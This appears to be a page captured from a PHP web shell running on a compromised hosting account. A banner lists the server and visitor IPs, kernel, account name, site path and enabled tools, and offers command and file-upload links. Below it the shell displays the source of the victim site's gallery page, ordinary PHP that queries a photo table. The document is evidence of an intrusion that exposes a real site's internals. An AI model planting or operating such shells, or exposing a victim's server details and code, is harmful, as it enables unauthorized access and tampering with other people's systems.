Server IP : 103.53.40.154 / Your IP : 3.128.31.227 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/automationpowersolutions.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include_once('config.php');?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <!-- Responsive --> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <?php include 'headlink.php';?> <title>Gallery | <?php echo $data['admin_name']?></title> <meta name="description" content="Gallery | <?php echo $data['admin_name']?>"> <style> .gallery-img img { width:250px; height:250px; margin:10px; } </style> </head> <body> <?php include 'header.php';?> <!-- Page Title --> <section class="page-title" style="background-image: url(<?php echo $wspath?>images/background/9.jpg)"> <div class="auto-container"> <ul class="bread-crumb clearfix"> <li><a href="<?php echo $wspath?>">Home</a></li> <li>Our Gallery</li> </ul> <h2>Our Gallery</h2> </div> </section> <!--End Page Title--> <marquee class="marquee-text"><?php echo $datamarq['message'] ?></marquee> <section class="milestone-gallery text-center"> <div class="container"> <div class="row"> <?php $sqlgal = "SELECT * FROM `tb9_gallery_photo`"; $rungal = mysqli_query($db,$sqlgal) or die("Query Not run"); while($datagal = mysqli_fetch_assoc($rungal)){ ?> <div class="col-md-3"> <div class="gallery-img"> <!--Image Box--> <figure class=""><a class="lightbox-image" href="<?php echo $wspath?>images/products/<?php echo $datagal['image']?>"> <img src="<?php echo $wspath?>images/products/<?php echo $datagal['image']?>" alt=""></a></figure> <!--Image Box--> </div> </div> <?php } ?> </div> </div> </section> <?php include 'footer.php';?>